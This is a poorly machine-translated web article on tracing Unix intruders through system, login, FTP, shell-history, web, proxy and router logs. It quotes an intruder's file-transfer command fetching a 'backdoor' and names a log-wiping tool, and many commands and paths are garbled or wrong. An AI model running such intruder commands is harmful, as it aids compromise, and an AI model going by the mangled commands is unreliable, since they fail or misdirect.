Home IT Linux Windows Database Network Programming Server Mobile  
  Home \ Linux \ Security: Unix operating system intrusion tracking Strikes Back     - 4 lvcreate example commonly used commands (Linux)

- Linux system with a firewall to prevent the DOS attack (Linux)

- Docker build their own private warehouses (Linux)

- Linux file permissions bit forced bits and adventure Comments (Linux)

- Ubuntu 14.04 VirtualBox can not start solution (Linux)

- MySQL 5.5 on master-slave copy filter (Database)

- How to build a container cluster (Server)

- Linux system performance analysis and top command ps.pstree Comments (Linux)

- On the Web application attack techniques Common (Linux)

- ACL permissions Linux command (Linux)

- Build ASP.NET 5 development environment in Ubuntu (Server)

- MySQL partition summary (Database)

- Good wireless network security information spread in the air (Linux)

- C ++ 11 feature: auto keyword (Programming)

- Cacti Linux-based system monitoring and alarm (Linux)

- How to fix Ubuntu / Mint can not add PPA source of error (Linux)

- Compile and install the latest version of Redis Stable (Database)

- Oracle archive log full cause abnormal slow database performance (Database)

- Linux, how to filter, split, and merge pcap file (Linux)

- iOS in Singleton (Programming)

  Security: Unix operating system intrusion tracking Strikes Back
  Add Date : 2018-11-21      
  After the invasion Unix systems to determine the loss and the intruder attacks the source address is very important. Although most intruders know how to use them has been compromised machine as a springboard to attack your server before they launched a formal attack made target information collection (exploratory scan) often work from their machine started, how to analyze this introduction from the invasion of the system logs the intruder's IP and to be determined.


/ Var / adm is UNIX log directory (under linux is / var / log). Under a considerable number of logs stored in ASCII text format, of course, let's focus first of all concentrated in the messages of this file, which is also of concern to the intruder, it records the information from the system level. Here, extensive logging for us is useless.

For example:

Apr 25 21:49:30 2000 unix: Copyright (c) 1983-1997, Sun Microsystems, Inc.

Apr 25 21:49:30 2000 unix: mem = 262144K (0x10000000)

Such recording copyright or hardware information is displayed while:

Apr 29 19:06:47 www login [28845]: FAILED LOGIN 1 FROM xxx.xxx.xxx.xxx,

User not known to the underlying authentication module

Such records Login failed:

Apr 29 22:05:45 game PAM_pwdb [29509]: (login) session opened for user ncx by (uid = 0) so the first step should be Kill -HUP cat `/ var / run / syslogd.pid` (of course, possible intruder has helped us done, ;-) so we do not get any useful information)

In the following website you can find a large number of audit log analysis tools, or feet:


2.wtmp, utmp logs, ftp logs

You can be in / var / adm, / var / log, / etc directory, locate the file named wtmp, utmp, which records the user when and where telnet host, the hacker in the oldest and most popular zap2 ( file name compiled commonly called z2, or called wipe). Also used to erase information in these two files the user is logged in, but because of laziness or poor network speeds (> 3 seconds will cause the collapse of the echo, and I often met 10 times this echo time), many intruders do not upload or compile this file, the administrator is required to use the lastlog command to get the source address of the intruder last connection (of course, this address may be one of their springboard) ftp logs usually / var / log / xferlog, the text file detailed records of www.britepic.org upload files to FTP time, source, file name, and so on. However, because the log is too obvious, so a little more sophisticated intruders rarely use this method to transfer files. Use rcp some of the more common. Of course, you can # cat / var / log / xferlog | grep -v 202.106.147 to see those addresses that should not be there.


After obtaining root privileges, the intruder build their own invasion of account, a more advanced technique is similar to uucp, lp do not use the system user name plus password. After the invasion, even if the intruder deleted. sh_history either. bash_hi-story such a file, execute kill -HUP `cat / var / run / inetd.conf` can remain in memory pages bash command record written back to disk, and then perform the find / -name.sh_historyprint, carefully view each suspicious shell command log. Especially when you are in the / usr / spool / lp (lp home dir), / under usr / lib / (uucp home dir) such directories uucp / find. sh_history file. Intruders often target when needed and working machine to transfer files to avoid being syslog, may use ftp to work from the target machine, so sh_history you may find similar or ftp xxx.xxx.xxx.xxx rcpnobody @ xxx.xxx.xxx.xxx:/tmp/backdoor / tmp / backdoor so shows intruder IP or domain name of the command.

4.http server log

This is probably the most effective way to attack the intruder true birthplace OK. The most popular apache server, for example, the? Under $ / logs / access.log directory you can find this file, which describes a visitor's IP, access time and requesting access to content. After the invasion, we should be able to find in the file similar to the following: record: xxx.xxx.xxx.xxx - - [28 / Apr / 2000: 00: 29: 05 -0800] "GET / cgi-bin / rguest.exe "404 -xxx.xxx.xxx.xxx - - [28 / Apr / 2000: 00: 28: 57 -0800]" GET /msads/Samples/SELECTOR/showcode.asp "404 - from the IP to xxx. xxx.xxx.xxx someone in the April 28, 2000 of 0:28 /msads/Samples/SELECTOR/showcode.asp trying to access the file, which is using the web cgi scanner in the aftermath of the log. Most of the web scanner is based on MS operating system, and for faster, use Unix-based scanner intruders often choose the nearest server. Combined attack time and IP, we can know a lot of information invaders.

5. core dump

This is a relatively complex method, but also effective. A safe and stable daemon running time is not going to dump the core of the system, when the intruder remote exploits, many services are performing a getpeername socket function calls (see socket programming), so the intruder's IP also stored in memory, the service overflow, system p memory page file is to dump core files, which means you may be in a large section of the chaotic character (in fact, a global database of process variable) containing a find there do this expoloit of IP.BTW: this is a reference to the post-http://members.tripod.com/mixtersecurity/paper.html written, I made a long-range attack cmsd test, but only in the middle to find Some commands remote intruder to overflow, and did not find the IP. However, this is still reason to believe that Mixter (paper.html author) words.

6. The proxy server logs

Acting is a medium-sized enterprise network is often used as an interface to do the internal and external information exchange, it faithfully recorded each user accessed the content, of course, also include access to content intruder. The most common squid proxy, for example, you can usually find access.log this huge log files in / usr / local / squid / logs / down, of course, because the log record is added quickly after accidents should be timely backup it. You can get squid at the following address log analysis script: http: //www.squid-cache.org/Doc/Users-Guide/added/stats.html sensitive files by analyzing the access log, you can know who and when these present the secure access content.

7. router log

By default, the router does not record any scan mode and login, so the intruder used it a springboard to carry out attacks. If your enterprise network is divided into military zones and the demilitarized zone, then add the router's log records will help in the future to track the intruder. More importantly, for administrators, such an arrangement can be determined attacker in the end is within or outside the Pirates of the thief. Of course, you need an extra one server to place router.log file.

On the CISCO router:

router (config) # logging faclity syslog

router (config) # logging trap informational

router (config) # logging [server name]

On the log server:

I. joined a line in /etc/syslog.conf:

* .info /var/log/router.log

. II makefile log file:

touch /var/log/router.log

. III restart syslogd processes:

kill -HUP `cat / var / run / syslogd.pid`

For an intruder, in an attack the whole process does not attempt to establish tcp connection target is unlikely, there are many subjective and objective reasons intruder, and the attack is not very difficult to leave a log of. If we spend enough time and effort, we can analyze the desired information from a large number of logs. On the intruder's behavior in terms of mental permissions they have made on the target machine the greater, the more they tend to be conservative way to build connections with the target machine. Careful analysis of the early log, especially the part containing the scan, we can have a greater harvest.

Log audit only as a passive means of defense after the invasion. Initiative is to strengthen their own learning, time to upgrade or update the system. Be prepared is the most effective way to prevent the invasion.
- CentOS Nginx achieve 3 virtual machine load balancing (Server)
- Windows SmartGit installation (Linux)
- Linux system versions organize local root password cracking method (Linux)
- Oracle 11g principle study Dataguard (Database)
- To share some very useful Vim command (Linux)
- Installation image conversion tool on your Ubuntu Converseen 0.8.1 (Linux)
- TypeScript basic grammar (Programming)
- Linux Mint 17.2 64 bit installation Docker and management software seagull (Linux)
- Embedded Linux to solve the problem in the time zone (Linux)
- To delete the directory and all specified files under the Mac (Linux)
- The array of C language (Programming)
- 10 tips daily Docker (Server)
- New features of Java 9 HTTP2 and REPL (Programming)
- NAT and firewall under Linux (Linux)
- Hadoop scheduling availability of workflow platform - Oozie (Server)
- Usage logs Python library (Programming)
- Ubuntu 12.04 kernel configuration automatically restart and crash dump (Linux)
- Linux non-graphical interface to install Oracle Database (Database)
- Java interface and inheritance (Programming)
- CentOS6.3 build a Python 3.3 environment to access Oracle 11gR2 (Database)
  CopyRight 2002-2016 newfreesoft.com, All Rights Reserved.